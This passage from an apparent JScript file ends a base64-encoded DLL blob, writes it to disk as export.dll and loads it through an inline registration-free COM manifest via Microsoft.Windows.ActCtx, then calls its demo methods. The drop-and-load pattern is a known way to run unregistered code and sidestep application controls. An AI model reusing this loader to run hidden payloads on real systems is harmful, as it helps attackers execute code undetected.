AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAorKCsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=';

	binaryWriter(dynwrapX,scriptdir+"\\export.dll");



	// You could add a way to drop this dynamically
	var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="Export" version="0.0.0.0"/> <file name="Export.dll"> <comClass description="Export Class" clsid="{185FAAFF-9A8A-41B4-809A-CA6EEAA95D61}" threadingModel="Both" progid="DynamicWrapperDotNet"/> </file> </assembly>';
	var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
	ax.ManifestText = manifest;

	var mdo = ax.CreateObject("DynamicWrapperDotNet");
	var s = mdo.getValue1("a");
	WScript.StdOut.WriteLine(s);
	var t = mdo.getValue1("b");
	var s = mdo.getValue2();
	mdo.getValue3();
	WScript.StdOut.WriteLine(s);
	WScript.StdOut.WriteLine(t);